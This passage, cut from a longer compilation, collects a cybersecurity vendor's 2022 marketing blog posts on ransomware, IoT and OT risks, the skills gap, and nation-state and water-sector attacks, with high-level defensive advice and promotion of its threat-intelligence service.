exploited, resulting in a ransomware ‘gang’ extorting the bank and publishing personal details of the bank’s customers on their leak site. This data included names, SSNs, addresses, tax records, and phone numbers. It’s critical you prevent these kinds of attacks from hitting your systems, and threat detection and response tools can help you be prepared. Avoid costly downtime and hefty ransoms and maintain your reputation and client trust.   How to proactively prevent attacks Leverage cyber threat intelligence in near real-time to shield your bank from all known threats. By inspecting all network traffic, our service also helps safeguard your network, supply chain, and employees from ransomware and other attacks, whilst improving threat visibility. Learn more about how you can proactively strengthen your cybersecurity posture here. --- ### [How to Shield Your IoT Devices and OT Environments](https://www.centripetal.ai/blog/iot-devices-cyber-threats) Published: 2022-09-26 Summary: Outdated software is one of the biggest cybersecurity risks to all industries. Keep your OT and IoT devices healthy by deploying continual updates. The cyber threat landscape is constantly shifting, with the methods used by malicious actors becoming increasingly sophisticated in order to evade cyber defenses. As attacks on all industries become more complex, industrial environments and manufacturing networks are more vulnerable. In addition to traditional data theft and espionage, hackers will now target your operational technology (OT) equipment and Internet of Things (IoT) devices - from medical devices to robotics. Because your OT and IoT devices are constantly monitoring and collecting sensitive data, they have become a valuable target for malicious actors. There were 1.51 billion breaches of IoT devices in the first half of 2021 alone, and OT ransomware incidents have increased by 133% since 2020. How are your OT systems and IoT devices vulnerable, and what can you do to minimize these risks?   OT and its vulnerabilities Your OT is vital in getting processes done faster, safer, and cheaper. But much of this technology is decades old and therefore not designed to defend against modern-day cyberattacks. This makes any system vulnerabilities complicated to patch and a lack of features like user authentication and encryption puts your OT directly in the firing line of hackers. Your OT also attracts cyber criminals due to the wide-scale disruption that they can cause; when OT assets were shut down during the Colonial Pipeline incident in 2021, it triggered a major fuel shortage along the East Coast. Hackers are also looking to OT attacks for financial gain, with 80% of OT environments experiencing a ransomware attack last year. And the potential cost of a cyberattack on your OT isn’t limited to ransom demands - downtime and reputational damage can have long term financial effects on your business. When the LockerGoga ransomware reduced Norsk Hydro’s Extruded Solutions unit to run at 50% capacity in 2019, it cost the manufacturer up to $70 million.   IoT and its vulnerabilities IoT is at the center of the IT/OT convergence. Your IoT trackers, sensors, motion detectors, and voice controllers are designed to communicate over your networks, often over considerable distances, meaning they’re constantly collecting sensitive and valuable data that is highly targeted by malicious actors. And because we are still realizing the security challenges of smart and connected devices, these devices have limited computational abilities, meaning there is a small footprint for built-in data protection and cyber defense. Your IoT devices can also act as a backdoor for hackers looking to access and move laterally through your network, making them vulnerable to privilege escalation, man-in-the-middle (MitM) attacks, malware, and distributed denial-of-service (DDoS) attacks. With only 24% of IoT devices using encryption when transmitting data, and attacks on IoT more than doubling in 2021, it’s clear that many of these devices lack adequate security controls. And the level of concern is much higher in IoT, as attacks have the power to cause physical destruction, harm individuals, and cause systemic failures within your business. One such example was in 2017, when the FDA discovered serious cybersecurity vulnerabilities in implantable pacemakers made by medical manufacturer St Jude Medical.   Requirements when securing IoT and OT 1. Network visibility You need to be aware of everything running on your network, as well as the risks that your OT/ICS infrastructure introduce to SCADA and IoT devices. This means understanding the behavior of all devices, clearly defining your attack surface, and effectively distinguishing between managed and unmanaged devices. Network traffic visibility gives you actionable intelligence around the cyber threats targeting your devices, and by employing proactive monitoring, you can quickly identify unauthorized or compromised devices. Overall network visibility and monitoring can be achieved by using sensors, analyzing device logs, or utilizing a centralized network tool. 2. Supply chain sensitivity As a manufacturer, you work closely with partners up and down the supply chain, integrating them into their infrastructure and enabling the easy transferring of data between their OT and IoT devices. But this expands the potential attack surface, increasing the risk of cyberattack. In 2021, these supply chain cyberattacks increased by 51%. Mitigate supply chain risk by securing privileged access management and implementing a Zero Trust network architecture. OT and IoT devices within the supply chain should also be continually tested and certified to ensure they comply with the relevant cybersecurity regulations and best practices, reassuring your customers and your wider ecosystem of supply chain partners. 3. Updated software Outdated software is one of the biggest cybersecurity risks to all industries. Because many IoT devices have no other layer of cyber protection, updating their software regularly is crucial for ensuring that your devices contain the latest security patches and are able to clean up any security flaws from older software. Keep your OT and IoT devices healthy by deploying continual updates as they arise or use a centralized, automatic update management solution.   How we help With industrial infrastructure a primary target, we have partnered with Dynics to combine our IT and OT expertise in order to better protect critical infrastructure and industrial control systems across the United States.   Our service operationalizes threat intelligence to shield your network from cyber threats. Watch below to learn more.   Achieve unprecedented protection for your organization with intelligence-based network defense. --- ### [How to Protect Your Law Firm from the Rise in Ransomware](https://www.centripetal.ai/blog/how-to-protect-your-law-firm-from-the-rise-in-ransomware) Published: 2022-09-14 Summary: The legal industry was the most heavily impacted by ransomware attacks during Q1 2021. How can law firms strengthen their ransomware defenses? Whether it’s client intellectual property (IP), M&A transaction agreements, or corporate trade secrets, the legal services sector collects a lot of sensitive data. And where there is sensitive data, there is money to be made, with malicious actors increasingly attempting to exploit, sell, or hold legal data to ransom. The legal industry was the most heavily impacted by ransomware attacks during Q1 2021, with almost 25% of ransomware targeting small and midsized firms. So how can law firms strengthen their ransomware defenses? How do ransomware attacks affect the legal sector? One of the most high-profile ransomware attacks on the legal industry occurred in 2020 when prominent US entertainment law firm Grubman Shire Meiselas & Sacks lost data belonging to Madonna, Elton John, Lady Gaga, and a number of other celebrities. The firm refused to pay the ransom of $42 million and some of the lost data remains available for purchase online. Many law firms might be tempted to pay such sums if it ensured that their sensitive data was recovered in full. But with ransomware, even if the sum is paid, only 42% of payments result in the restoration of all systems and data. For a business that typically bills by the hour, downtime is one incredibly costly side effect of ransomware. The average downtime that businesses experience while they coordinate their response and get their systems back online is around 20 days - more than enough time to inconvenience customers and partners. When DLA Piper, one of the world’s largest law firms, was hit by a high-profile ransomware attack in 2017, the firm’s telephone and email communications could not be fully restored for nine days. Despite not paying the ransom, the business cost of this downtime was estimated to be in the millions. Another major consequence of falling victim to a ransomware attack is reputational damage, which can result in lost customers, plummeting share prices, and lost trust from partners up and down the supply chain. And your possession of customer Publicly Identifiable Information (PII) also puts your law firm at a greater risk of breaching regulations like GDPR, HIPAA, FISMA, and PCI-DSS. In 2022, UK firm Tuckers Solicitors was fined almost £100,000 by The Information Commissioner’s Office (ICO) for failing to secure sensitive data including medical files, witness statements, and the names and addresses of victims. How to strengthen legal cyber defenses  Hackers don’t discriminate based on business size. Whether you’re part of a small legal service company or one of the largest firms in the world, hardening cyber defenses against ransomware attacks is a crucial part of avoiding the financial, reputational, and legal consequences of a data breach. 1. Zero Trust Firms that follow remote working policies, or have employees accessing their networks via personal devices and on public wifi, see an increase in potential entry points for hackers. By employing a Zero Trust security strategy, whereby you never automatically trust anyone inside or outside your network perimeters, you enable a multilayered defense that minimizes the attack surface for hackers and limits their ability to move laterally throughout your network. 2. Incident Response Planning A survey by the American Bar Association (ABA) found that only one third of law firms claimed to have an incident response plan, with this number dropping even lower in smaller firms. By developing a strong incident response plan that addresses your business’ unique vulnerabilities, your ability to react and recover from a ransomware attack is much greater, and the risk of data loss, downtime, and reputational damage is reduced. 3. Employee Education More than 90% of cyber attacks start with human error, and ransomware is no different. Hackers use sophisticated social engineering techniques to gain the trust of users and enter a network, allowing malware to spread further, faster. Your employees should understand their role in identifying and preventing ransomware attacks; committing to regular, ongoing training builds a company culture that is cyber-aware and helps bridge the cybersecurity skills gap. 4. Strong Security Tools While your employees are your first line of defense, prevention technologies should be your second. Only around 43% of law firms use file encryption, less than 40% use email encryption and intrusion prevention, and less than 30% use intrusion detection. To decrease the chances of ransomware attacks gaining entry into your network, it’s important to employ strong and easy-to-use security tools that are continuously updated to defend against emerging threats. How we help Our service offers a stream of intelligence data from over 3,500 cyber threat feeds, alongside our team of skilled security analysts. By inspecting all network traffic, our service helps you shield your network from ransomware and other attacks, continuously building and improving your cyber defenses. Learn more about how you can proactively strengthen your cybersecurity posture, here. --- ### [Augment Your Cybersecurity Posture with Professional Services](https://www.centripetal.ai/blog/how-to-augment-your-cybersecurity-posture-with-professional-services) Published: 2022-09-02 Summary: By incorporating a professional services team with extensive technical knowledge, you can protect your business against ever-evolving threats. Cyberattacks have become so common that it’s no longer a matter of “if” but “when” your business will be hit. And when it comes to identifying and remediating cyber threats, you need to know what you’re facing. But selecting, deploying, and managing multiple technologies, particularly amid the current cyber skills gap, is time-consuming and expensive. How can you improve your cyber posture despite all of this? By incorporating an experienced and highly trained professional services team with extensive technical knowledge, you can protect your business against ever-evolving threats. So where do you begin? On-demand incident response A data breach can cause widespread disruption within your organization. The average downtime a company experiences after a ransomware attack is 21 days, and each hour of this downtime costs businesses an average of $88,000. Operational disruption is not only expensive, it can affect your standing in your industry and impact your customers’ health and wellbeing. To reduce the damage done to your business by a cyberattack, whether it be financial, operational, or reputational, Incident Response (IR) can help you recover as quickly as possible. An IR team identifies cyber incidents, contains attackers, eliminates re-entry opportunities, restores systems, and improves future defenses. An IR team should be monitoring your organization’s network 24/7 to assess, contain, and resolve threats as they arise. In addition to minimizing operational downtime, IR helps to reassure your customers that their information is safe, particularly if your business collects Personally Identifiable Information (PII) like social security numbers or financial information. While some businesses opt to handle IR internally, nearly 40% aren’t confident that their internal teams can handle a data breach. And if you are a smaller organization struggling to cope with the ongoing cyber skills gap, outsourced Incident Response is the most effective way of alleviating the cybersecurity burden from your in-house team. Outsourced IR provides you with a higher level of technical expertise, allowing your business to leverage the latest host and network-based digital forensics. It also gives your business network monitoring on-demand and around-the-clock, with the IR team assessing and responding to incidents remotely on your behalf. Penetration testing The methods cybercriminals use are always evolving. Hackers can now launch attacks from anywhere in the world, collaborating as a group to attack infrastructure from multiple entry points. Automation has also been adopted by hackers, for example the recent rise of Meris, a DDoS botnet which can generate a massive volume of requests per second. To successfully protect your network from these types of threats, you need to be able to upgrade your defenses at the same rate. A penetration test, or pen test, is a simulated cyberattack designed to identify exploitable vulnerabilities within your business’ network. A pen test involves mimicking hackers’ strategies to uncover any number of issues within your systems, including application flaws, improper configurations, or risky end-user behavior. By conducting a pen test, your business validates both the efficiency of the organization’s cybersecurity solutions and end-user adherence to security policies. By using skilled ethical hackers, you’re able to have your finger on the pulse and identify where your network is susceptible to emerging hacking techniques. And with the average compliance fine per PII record being around $150, using ethical hackers is an effective way to test your adherence to regulations such as the GDPR, HIPAA, FISMA, and PCI-DSS. Security awareness training Human error is the root cause of at least 95% of security breaches. Whether it’s through an employee clicking on a malicious link, failing to install a critical update, or choosing a weak password, your business is put at risk by your staff every single day. This risk is exacerbated by the growing prominence of social engineering, where hackers exploit human trust to gain access to confidential information or get your users to download malware. Security awareness training educates your employees on cyber hygiene and the security risks associated with each person’s role. Your training should cover topics such as malware, phishing, device security, cloud security, and password training. By combining topical training with regular security simulations you help to build and maintain a culture of security within your organization, priming your employees to act as the first line of defense against attacks. This reduces cyber risk and therefore decreases the loss of PII, revenue, and brand reputation. For your security training to have a lasting impact, ensure it’s designed to fit each employee's schedule and delivered by experts that can field all questions and concerns. By encouraging team collaboration through training, cybersecurity becomes part of every employee’s role, rather than the sole responsibility of just the security staff. How we can help Our Professional Services strengthen, test, and maintain your cybersecurity posture. On-demand incident response leverages the latest technologies and malware analysis to assess, validate, and respond to threats. Our penetration testing services identify vulnerabilities in assets before providing comprehensive remediation instructions to your staff. And to complement these strategies, our end-user awareness training provides engaging educational content that is continually updated to include emerging and zero-day threats. Best of all, these services are provided by highly qualified and certified professionals, who have decades of combined cyber experience securing some of the most sensitive networks at the DoD, the NSA, the CIA, and the White House. Learn more about our professional services here.   --- ### [How Can Businesses Help Close the Cybersecurity Skills Gap?](https://www.centripetal.ai/blog/how-can-businesses-help-close-the-cybersecurity-skills-gap) Published: 2022-08-17 Summary: Every business, no matter its size or sector, has been impacted by the persistent cybersecurity skills gap. Every business, no matter its size or sector, has been impacted by the persistent lack of cybersecurity professionals. The cyber workforce gap is estimated at  2.72 million professionals, and (ISC)2 predicts that the global cyber workforce needs to grow by 65% to effectively protect organizations' networks. What is causing the cybersecurity skills gap? The reasons range from a lack of formal training and a negative perception towards security roles, to heightened stress levels within cyber teams. But no matter the reason, the cyber skills gap can be detrimental. The impact of the cybersecurity skills gap The gap directly weakens the cybersecurity posture of businesses, causing misconfigured systems, delayed patches, rushed deployments, insufficient risk assessments, and a general lack of threat awareness. These vulnerabilities make networks far more likely to be hit by cyberattacks, particularly when those attacks rely on human error. Over the last 12 months, 80% of organizations worldwide have experienced at least one breachthat can be directly attributed to an internal lack of cybersecurity skills. And 64% of these breaches resulted in the loss of revenue, recovery costs, or fines. How are global governments bridging the cybersecurity skills gap? With the cyber skills gap showing no sign of slowing, governments and education organizations around the world are stepping in. The US Department of Labor announced that it will partner with the White House and the US Department of Commerce to run a 120-day Cybersecurity Apprenticeship Sprint. The program aims to attract, train, and retain a diverse cybersecurity workforce that will be able to better protect the country’s critical national infrastructure and strengthen the economy. (ISC)2 ‘s 100K in the UK initiative is also providing 100,000 UK residents access to its entry-level cybersecurity education and certification for free. Since the program’s launch, (ISC)2 has opened this initiative up to 1 million additional cyber career pursuers worldwide with the intention of forming new pathways for entrants into the field. In Australia, Microsoft has partnered with AustCyber to design a traineeship program that combines formal training with on-the-job experience. The program supports Australians of all ages and backgrounds who are looking to build a career in the cybersecurity industry. While governing bodies are focusing on long-term education programs to attract and train the future workforce, it doesn’t provide immediate remediation for the issues being faced today. The techniques used by hackers are constantly evolving, and attacks grow in both number and sophistication every year. Therefore, even as we educate enough professionals to gradually fill the skills gap, their training will need to be constantly revisited and reassessed, at the time and expense of their employers. What can your business do? Identify your own skills gap    The first step in bridging the cyber skills gap is identifying what and where your problems are. By conducting activities like penetration testing, you can identify skills gaps and potential issues with existing employees who need to be upskilled or a lack of professionals in general. Improve awareness and education   While the most obvious way to patch these gaps is with recruitment, the scale of the talent shortage today means that hiring new positions can take time. Retaining existing staff should be equally as important to your business. To keep your networks protected from evolving cyber threats, continuous education and training is vital. Cybersecurity should be integrated into your entire organization, even among non-technical employees. Invest in the right tools   To help alleviate the burden of cybersecurity from human employees, find dedicated technology that automates or outsources cyber processes. After first establishing your needs and markers of success, find tools that cater to your vulnerabilities specifically, and use third-party expertise to augment your own cyber posture. However simply throwing multiple, disparate cybersecurity tools into the mix won’t help. The average business now typically has between 20 and 70 cybersecurity solutions, and managing a software stack this complex often results in alert fatigue. Alert fatigue not only affects employee focus and causes an increase in missed cyber threats; it also heightens workplace stress, which leads to higher staff turnover. Avoid alert fatigue by ensuring that the tools you use are easy to manage and versatile, eliminating the need for multiple, overlapping technologies. Learn how Walt & Company, a California-based PR Agency addressed their cyber skills gap through security awareness training and vulnerability testing. Watch below: About CleanINTERNET Our CleanINTERNET service proactively protects organizations from known cyber threats identified by the global threat intelligence community. Combining 3,500 threat feeds, organizations are shielded from 99% of all known cyber threats, creating a Zero Trust network environment. Our elite team of Full Spectrum Analysts go far beyond detection, providing your security team with actionable real-time protection through Advanced Threat Detection. This helps to alleviate both the burden of alert fatigue for your cyber team, and of hiring during a talent shortage.  With experience securing some of the most sensitive networks at the DoD, the NSA, the CIA, and the White House, we provide the experience and skills you need to protect your network, your customers, and your reputation. Learn more. --- ### [How Cyberattacks Affect Business Reputation](https://www.centripetal.ai/blog/how-cyberattacks-affect-business-reputation) Published: 2022-07-28 Summary: But financial loss isn’t the only negative consequence of a breach — reputational damage can be just as harmful to businesses. When an organization is hit by a cyberattack, the amalgamation of ransoms, liability expenses, and regulatory fines can result in devastating costs. In 2021, the average cost of a data breach rose to $4.24 million per incident, the highest in history. But financial loss isn’t the only negative consequence of a breach — reputational damage can be just as harmful to businesses. Losing the trust of customers is difficult to recover from, as many will leave and never return; 87% of consumers are willing to take their business elsewhere if a data breach occurs. Future business growth can also be jeopardized, with potential customers driven away by bad press or word-of-mouth. While large companies might be able to absorb a partial loss in customers, losing customers, partners, suppliers, and investors due to reputational damage could be disastrous for small and mid-sized businesses (SMBs). Business interruption It doesn’t matter if the target organization is a large corporation with a detailed recovery plan or a small enterprise with fewer resources, downtime is always experienced during and after a cyberattack. In 2021, the average downtime as a result of a ransomware attack was 20 days, often resulting in lost revenue and unproductive, overworked employees. Particularly in retail, utilities, and critical national infrastructure, the speed of delivering products and services is crucial. Attacks like those on the Colonial Pipeline and Eskenazi Health in 2021 have even led to utility shortages and delayed access to healthcare. Any disruption to these services can be a huge inconvenience to customers, even putting them in danger, affecting public perception of the brand in the long term. Breaking customer trust Cybercriminals target customers’ personally identifiable information (PII), including names, addresses, social security numbers, credit card details, and healthcare records, before selling these records in underground digital marketplaces (underground economy). When this personal data is exposed or stolen, customers feel betrayed. A breach is usually seen by the public as a failure on the company’s part in protecting the personal data that they have collected, no matter how sophisticated the cyberattack they suffered. Compromised PII, therefore, leads to a loss of customer trust and many will simply take their business elsewhere. A notable example is when UK telecommunications firm TalkTalk admitted that the personal details of over 150,000 customers had been exposed. In addition to the financial ramifications, the organization immediately lost over 100,000 customers and around a third of its company value. The impact on share price Cyberattacks can also damage a brand's long-term credibility by lowering its share price. When banking group Capital One suffered a data breach in 2019, in addition to spending $100-150 million on recovery and legal costs, the company’s share price fell by 6%. The impact can be substantial; one report shows companies experiencing a 25% fall in market value over the year following an attack. Avoid reputational damage with cyber threat intelligence Facing such huge reputational damage, it’s no surprise that ‘reputation loss after a cyberattack’ was the biggest concern of professionals, with 59% rating it as a major concern. And particularly for startups and SMBs that rely on reputation as the fuel for future business, it’s vital that reputational damage is minimized. The best way to protect your network and preserve your relationship with customers and partners is to secure your organization before a breach even occurs. Our cyber threat intelligence service, CleanINTERNET, delivers exactly that, shielding 99% of all known threats from entering your network. CleanINTERNET combines and analyzes over 3,500 cyber threat feeds into one service, with our experienced threat hunters working as an extension of your team to monitor the threats that are relevant to your business, no matter its size or industry. This creates a Zero Trust environment within your network, defending your customers and your partners’ data against a barrage of advanced persistent and zero-day threats. With CleanINTERNET, your business can predict and detect emerging cyber threats with no extra effort from your internal team, freeing them up for other business activities and avoiding the additional costs of reputational damage. Speak to a member of the Centripetal team about how your business can benefit from CleanINTERNET today. --- ### [How Do Cyberattacks Impact Large Enterprises?](https://www.centripetal.ai/blog/how-do-cyberattacks-impact-large-enterprises) Published: 2022-07-07 Summary: Despite having larger budgets and more resources on hand than SMBs, large enterprises’ cybersecurity maturity is well below average at 46%. Businesses of all sizes are vulnerable to cyberattacks. However, large enterprises find themselves particularly vulnerable to sophisticated ransomware, nation-state, and insider attacks due to their complex and diverse organizational structures. And where these ‘big fish’ have annual revenue in the billions, they are a far more attractive target to hackers seeking financial gain or looking to cause widespread disruption. But despite having larger budgets and more resources on hand than SMBs, large enterprises’ cybersecurity maturity is well below average at 46%. A vast attack surface Put simply, large enterprises have a bigger surface area for malicious actors to exploit. Every day large businesses connect to the Internet with more devices than their smaller counterparts. And their bigger employee networks increase the risk of human error, which accounts for 22% of all cyber breaches. Plus, larger enterprises are connected to a wider network of partners from up and down the supply chain, putting their networks at a greater risk of supply chain incidents like the SolarWinds attack. A larger attack surface makes it challenging for security teams to see, identify, and prevent threats quickly. While penetration tests found that 34% of system vulnerabilities found in mid-sized businesses were high risk, almost half (49%) of these were deemed high risk in large enterprises. Response times can also be lengthy, with data breaches going unnoticed within vast networks for months. The average company takes 197 days to detect a breach and 69 days to contain it — more than enough time for attacks to spread throughout the business. Resource challenges While they may not feel the impact of the cyber skills gap as much as SMBs, large enterprises face other resource challenges. Most large-scale companies have the financial and human resources to employ security solutions but have misplaced confidence in their ability to use them effectively. Enterprises employ an average of 45 cybersecurity-related tools, yet research shows that while investment is increasing, effectiveness is decreasing. Enterprises with over 50 cyber tools even rated themselves less able to detect cyber threats than those with under 50, finding their response efforts hindered by the complexity of managing multiple, fragmented tools. With so many hackers devising new advanced persistent threats, large enterprises’ cybersecurity solutions, and therefore their security staff, are being barraged by alerts. This can quickly overwhelm staff and lead to widespread alert fatigue; companies with 500-1,499 employees now ignore or don’t investigate 27% of all alerts. Alert fatigue sees organizations fall victim to cyberattacks that could have been remediated, not to mention the disconnect it causes between business leaders and security personnel. Heightened impacts In attacks like ransomware, the bigger the organization, the more ransom malicious actors will demand. In 2021, Russian ransomware-as-a-service gang REvil demanded $50 million from Apple supplier Quanta to release encrypted data. But after breaching Quanta and stealing future product designs, REvil pivoted and demanded that Apple pay the ransom. And even if a large organization refuses to pay a ransom, the disruption caused by recovering compromised systems leads to further revenue losses. Additionally, when a large enterprise with a big stake in the supply chain has its operations disrupted, global supply and demand can be impacted. When JBS Foods and Colonial Pipeline were hit by separate ransomware attacks in 2021, entire supply chains felt the impact of widespread shortages and subsequent price hikes. Why large enterprises need cyber threat intelligence When dealing with millions of transactions and customers, large enterprises need a solution that detects emerging cyber threats in the most demanding network environments. Centripetal’s CleanINTERNET service is designed to serve some of the largest critical infrastructure providers and government agencies in the world. CleanINTERNET aggregates over 3,500 cyber threat feeds to shield against 99% of known threats. Our Zero Trust inspection of all inbound and outbound traffic dramatically reduces events, alerts, and log data within networks. And with our elite team of cyber threat analysts acting as an extension of your team, alert fatigue is also minimized. CleanINTERNET saves millions of dollars on multiple, disparate cyber threat feeds, uniting your threat detection into one flexible service that’s easy to deploy. With CleanINTERNET, large enterprises are afforded peace of mind that their customers, partner network, and reputation are protected from cyberattacks. Find out how cyberattacks impact specific industries on our blog and get in touch with the Centripetal team for more information. --- ### [Why Mid-Sized Organizations Need Enterprise-Level Cybersecurity](https://www.centripetal.ai/blog/why-mid-sized-organizations-need-enterprise-level-cybersecurity) Published: 2022-06-29 Summary: With attacks increasing by 150% in the past two years, it’s vital that business leaders act now to strengthen SMB cybersecurity. They may not hit the headlines, but that doesn’t mean that cyberattacks on small and mid-sized businesses aren’t devastating. In fact, without the security resources of their larger counterparts, cyberattacks can be even more financially and reputationally crippling for SMBs. Almost half of all cyberattacks are now targeting SMBs, particularly those in the legal, insurance, retail, financial, and healthcare sectors. And with attacks on these SMBs increasing by 150% in the past two years, it’s vital that business leaders act now to strengthen their cyber defense. What kind of cyberattacks do SMBs face? 42% of SMBs admitted to experiencing a cybersecurity breach, with the most common type of threat being malware like spyware, viruses, keyloggers, and ransomware. Data breaches, website hacking, and DDoS attacks are also common security threats for SMBs. Social engineering attacks, whereby malicious actors manipulate employees to offer up confidential information, also heavily target smaller businesses, with organizations under 100 employees experiencing 350% more social engineering attacks than larger enterprises. Many of these attacks are opportunity-driven, stemming from incidents up or down the supply chain. Threat actors may target larger service providers as a way into the networks of various other smaller businesses, or infiltrate smaller businesses as a gateway into larger organizations. Either way, SMBs often find themselves caught in the crossfire. Growing companies are now faced with the same frequency and attack types as larger organizations, but they often lack the same layers of security needed to detect and remediate them. A lack of resources and weaker defenses A major reason why SMBs don’t have the security measures that larger organizations do is the lack of resources. Without the large budgets and security teams that bigger companies have, SMBs lack the time to focus on cybersecurity; an issue exacerbated by the long-established cybersecurity skills gap. These same challenges are the reason why one-third of SMBs use only free or built-in cybersecurity tools, rather than investing in personalized or specialized solutions. However, despite 30% of small businesses in the US having weak points that bad actors can exploit, 56% of small business owners are not concerned about becoming the victim of a hack in the following 12 months. Without concern from business leaders, cybersecurity investment will diminish and SMBs may not realize its importance until it's too late. As with attack types, the consequences of a cyberattack do not differ based on the size of the organization targeted. Attacks can halt business operations indefinitely, putting employees’ livelihoods at stake and costing millions in lost revenue and recovery. Attacks can also cause reputational damage and a loss of trust with customers, partners, and clients, blemishing a brand long after it recovers from an incident. And for SMBs, any lost revenue, customers, lenders, or partners can be detrimental to the growth of their business. While larger businesses have greater funds and support for breach recovery, 60% of SMBs that are forced to suspend operations after a cyberattack are never able to reopen for business. Harnessing enterprise-level protection If SMBs are facing the same cyberattacks as larger organizations, then their cybersecurity solutions should be the same too. But any cybersecurity solution cannot overburden smaller security teams and must be able to suit an SMB budget. Enter CleanINTERNET, the cyber threat intelligence service that provides superior protection from 99% of all known threats. CleanINTERNET aggregates over 3,500 cyber threat feeds for you, providing a level of protection that is usually only available to larger organizations. Our experienced threat hunters work on behalf of your team to monitor and analyze emerging and zero-day threats that are relevant to your business, no matter its size or industry. Our service saves millions of dollars on separate cyber threats feeds and is offered at an affordable and scalable annual subscription model that grows as your business grows. And with easy deployment that gets you up and running fast, your business can improve its cybersecurity posture without impacting business operations. CleanINTERNET gives SMBs peace of mind through enterprise-class defense, at a scale and price suited to any business. See how CleanINTERNET caters to mid-sized organizations here and find out more about the cyber skills gap here. --- ### [Nation-State Threats to Power and Other Utilities](https://www.centripetal.ai/blog/nation-state-threats-to-power-and-other-utilities) Published: 2022-05-26 Summary: Nation-state threats target power companies because of the political and societal destruction they can cause. A cyberattack on a power company can have catastrophic consequences. One malicious email, infected assets, or a compromised supply chain partner can lead to loss of power across entire regions. While it’s acknowledged that their distributed infrastructure, increased digitalization, and reliance on supply chain partners puts power companies at an increased risk of financially motivated attacks like ransomware, a new and disturbing trend is emerging. Nation-state hacking groups, sponsored by governments across the globe, are increasingly targeting power facilities. Between 2017 and 2020, there was a 100% rise in ‘significant’ nation-state threats around the world, with almost half of these attacks targeting both physical and digital assets. Why do nation-state hackers target power companies? Nation-state attackers target energy companies because of the political and societal damage they can cause. Bringing any form of critical infrastructure to a standstill can have huge financial implications. And downtime and industry shortages can weaken a country’s power supply. State-sponsored groups may also be looking to establish a foothold in a specific network in anticipation of future geopolitical tensions. While physical destruction or information system Denial-of-Service (DoS) is a frequent motivation, there are other reasons why nation-states employ hackers to target the power industry. One such motive is espionage, whereby hackers capture information to steal trade secrets or to exploit in further attacks. Recent attempts to steal IP data on vaccines have demonstrated the lengths to which nation-state attackers are willing to go. Despite being highly sophisticated, state-sponsored attacks use many of the traditional techniques that hackers employ. These include data exfiltration, distributed denial-of-service (DDoS), supply chain compromises, and public-facing application attacks. But nation-state attackers are better equipped than your average hacking group, with government-backed financial support and access to their country’s most powerful resources. Global nation-state attacks that have impacted the power sector  Some of the first notable, successful nation-state attacks were those targeting Ukraine’s power grid in 2015 and 2016. In the winter of 2015, a first-of-its-kind cyberattack led to an interruption of electricity and water supplies for 230,000 people in western Ukraine, with hackers also sabotaging physical equipment to delay restoration attempts. The first confirmed sabotage of a power grid, this attack was attributed to the Russian hacking group “Sandworm”. Ukraine experienced another similar breach just a year later, this time targeting the SCADA systems of power supplier Ukrenergo and causing a blackout in northern Kyiv. Saudi Aramco became a target in 2017 when hackers damaged a power plant’s safety controllers and prompted a site shutdown. More recently in the US, the 2020 supply chain attack on software company SolarWinds compromised around 25% of the country’s power utilities. Despite many different countries launching nation-state attacks, a 2021 report found that 58% of these incidents originate from Russia, with the top three target countries being the US, Ukraine, and the UK. In light of this, the White House issued a warning in March 2022, urging critical infrastructure companies to “harden […] cyber defenses immediately.” Shielding against state-sponsored cyberattacks While nation-state attacks can cause huge damage, the methods used to prevent them are the same as for any other type of attack. The best way for power grids and utilities firms to secure their networks is to improve their visibility of cyber threats. And the best way to achieve this is through cyber threat intelligence. Centripetal’s CleanINTERNET is a centralized, simplified service that aggregates over 3,500 cyber threat feeds. CleanINTERNET automatically shields high-risk threats and delivers actionable reports on incoming cyber risks relevant to your business, becoming an extension of your team. This secures power companies from incoming and outgoing threats, even from trusted partners along the supply chain, creating a Zero Trust network environment. CleanINTERNET gives power companies enhanced threat visibility at a fraction of the cost of multiple, disparate threat feeds. Find out more about CleanINTERNET’s use in the power sector and how we detect and prevent nation-state attacks by getting in contact with our team. --- ### [The Danger of Cyberattacks on the Water Sector](https://www.centripetal.ai/blog/the-danger-of-cyberattacks-on-the-water-sector) Published: 2022-05-12 Summary: As the only utility service that we consume, a cyberattack on the nation’s water sector can have dangerous and life-threatening consequences. As the only public utility service that we physically consume, a cyberattack on the nation’s water sector can have dangerous and even life-threatening consequences. And with a wealth of data to protect and an expanding attack surface caused by digitalization, cybersecurity vulnerabilities are prevalent — in the past year, 10% of water utilities have reported a critical vulnerability and 40% a high vulnerability, with 80% of these being software flaws discovered before 2017. But despite these long-standing vulnerabilities, 60% of water organizations spent less than 5% of their budget on IT security in 2021. Why are water utilities vulnerable? Increased automation Like other utilities, the water sector has increasingly digitalized its systems, using automation to reduce personnel costs and streamline operations. SCADA and industrial control systems enable organizations to remotely monitor water levels, operate pumps and valves, and adjust chemical treatments. But these advances have also introduced cybersecurity risks, with systems storing more data and becoming increasingly intertwined with the Internet, expanding their attack surface. A lack of universal security standards Holding data on each customer, vendor, and partner in their ecosystem, water companies have a responsibility to maintain compliance with a variety of different security regulations, including the GDPR, CCPA, and PIPEDA. But the lack of universal regulations within the water sector means that many systems fail to meet basic security standards, and compliance efforts can divert human and financial resources away from other cyber activities. The cyber skills gap More than 70% of surveyed utilities reported having less than three full-time personnel dedicated to IT cybersecurity, and only 30% reported having a Chief Information Security Officer (CISO). Without enough trained personnel or an adequate security budget, water companies will struggle to detect, respond, and recover from a cyberattack. Cyber breaches targeting water systems One of the most alarming cyberattacks on the utilities sector was last year’s breach of a water treatment facility in Oldsmar, Florida. A hacker accessed the facility’s network, manipulating the level of sodium hydroxide, commonly known as lye, in the water to a corrosive and potentially poisonous level. Thanks to an employee who witnessed the hacker’s movements in real-time the attack was thwarted and the city’s 15,000 residents were saved from ingesting contaminated water. However, this employee initially failed to report the incident after assuming it was a fellow employee, and in a subsequent investigation, the FBI cited weak passwords and outdated operating systems as contributors to the hacker's success in accessing the system, demonstrating a need for better cybersecurity training and regulation. In March 2019 a similar attack succeeded in shutting down various components of a drinking water plant in Ellsworth, Kansas, after a former employee used their still-active remote-access credentials to tamper with the system. And in 2018, water utility systems in North Carolina and Colorado were hit with ransomware attacks, forcing customer service functions offline and requiring a complete rebuild of some systems. Nurturing cyber resilience in the water sector  Events such as the attack in Florida serve as a reminder of how frightening the consequences of a cyber breach on the water sector can be. In 2021, a joint advisory was issued by CISA, the EPA, and the NSA, warning of ongoing threats to water systems. The advisory identified that utilities are “inconsistently resourced,” relying on “unsupported or outdated operating systems and software” with known and exploitable vulnerabilities. To strengthen their cyber posture and reduce exposure to cyberattacks, water companies need real-time visibility into all emerging and present cyber threats. Centripetal’s CleanINTERNET service provides enterprise-class 